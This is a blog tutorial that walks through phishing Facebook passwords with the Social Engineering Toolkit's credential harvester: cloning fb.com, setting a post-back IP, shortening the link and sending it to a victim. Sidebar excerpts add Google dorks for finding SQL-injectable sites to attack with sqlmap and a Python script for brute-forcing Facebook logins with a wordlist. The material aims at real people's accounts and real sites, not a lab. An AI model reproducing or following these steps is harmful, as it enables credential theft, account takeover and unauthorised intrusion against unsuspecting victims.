How to hack facebook using kali linux : CREDENTIALS HARVESTER ATTACK

By -


Do you know ,you can hack facebook password with one fake fb page(phishing).

In this tutorial we will use Social Engineering tool i.e Credential Harvester attack in kali linux.
All you need to do is follow the tutorial as it is to see the Credentials Harvester into the action.



WHAT IS CREDENTIALS HARVESTER ATTACK ?

It is a part of SOCIAL ENGINEERING TOOLKIT. In this method the attack started with a creation of phishing page. Attacker set the post back ip address to receive the credentials like usernames and passwords. The attacker can shorten the ip address to make the ip address looks like a genuine url. When the victim visits the url and feed the login details, the post back feature of the page will send all the data to attacker.


LET'S DO THIS!!!!!!!!!

Follow this video..........



STEPS:

1. Boot up kali linux on your machine and open terminal.

2. Type this command in the kali linux terminal.
                    
                    root@kali~# setoolkit

3. Enter 'y' to agree the social engineering toolkit terms and conditions.

4. Select the following options one by one from the menu

                '1' (Social Engineering Attacks) then  
                '2'(Website Attack Vectors) then
                '3'(Credential Harvester Attack) then

5. Type '2' (Site cloner)

          set:webattack> IP address for the post back in harvesting:192.168.x.xxx (your ip address)
          
          set:webattack>Enter the url to clone: www.fb.com
6. Go to  Places > Computer > VAR > WWW and move all the files from www folder to html folder.

7.  Shorten your ip address with tinyurl.com and send it to the victim. When the victim open the link and enter the login details , you will get the username and password in a harvester text file which is located at Places > Computer > VAR > WWW. 

More Detailed Guides

If there's something that isn't clear then there's a 3 post series which covers this method in detail-

  1. Setting up the background - How Not To Hack Facebook (light read, no technical content, optional)
  2. Performing the attack on LAN - Hack Facebook via Social Engineering - Credential Harvestor attack
  3. Performing the attack on the internet - Port Forwarding and use of public IP to extent attack outside your LAN

Share with your friends

Comments

Post a Comment

Popular posts from this blog

Android 229 Keycode issue : Solved

By -
Hello World,           I was having one weird issue with an Android device and that is key code value is 229 and I wanted to prevent it. What I wanted to Achieve? The numeric keyboard on android device The keyboard can only press 0-9 digits no dot or no + - or anything limit character to 4 digit What is the problem? I was using onKeyUp or onKeyDown and more, but I was getting 229 or couldn't get the value at all. We will use the regex to validate the value and on the basis of value, we will set value.   So let's look at a running example of this: See the Pen Android-226-input by Parth Makadiya ( @parthmakadiya12-the-flexboxer ) on CodePen . Link: 1. Full Page view -  https://codepen.io/parthmakadiya12-the-flexboxer/full/zVEoEG 2.  https://stackblitz.com/edit/android-226-input Open it in Mobile and see codes.
Read more

HACK WEBSITE USING SQLMAP | KALI LINUX - BACKTRACK

By -
Image
BY Parth Makadiya In this tutorial I am going to show you how to hack a website with slqmap on Kali Linux. Introduction [ * ]Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. This is all about sqlmap.  Now follow my steps to hack a website using sqlmap. Step 1 [ * ]Find Sql vulnerable site.  I will give you some dorks which may help you finding websites vulnerable to Sql Injection. Code: ]inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurllay_old.php?id= inurl:declaration_more.php...
Read more

How to Brute Force hacking Facebook in Kali Linux

By -
Image
By Parth Makadiya hello all, how to learn facebook hacking?  facebook hacking  Brute force python scripting  We need a tool: 1. Python Script - facebook.py 2. Wordlist - e.g. pass.txt or wordlist.txt I have already installed python or  Install python  after installing step 1. [*]  root@lhackg:~# apt-get install python-mechanize step 2. now  downloading facebook.py [*] root@lhackg~# chmod +x facebook.py [*] root@lhackg:~# python facebook.py Note: - This tool can crack facebook account even if you don't have the email of your victim # Hit CTRL+C to quit the program # Use www.graph.facebook.com for more infos about your victim ^_^ # Enter |Email| |Phone number| |Profile ID number| |Username| :  lhackg.lhackg    << my facebook username [*] Enter the name of the password list file : /root/Desktop/pass.txt  <<   my wordlist localate         +=======================================...
Read more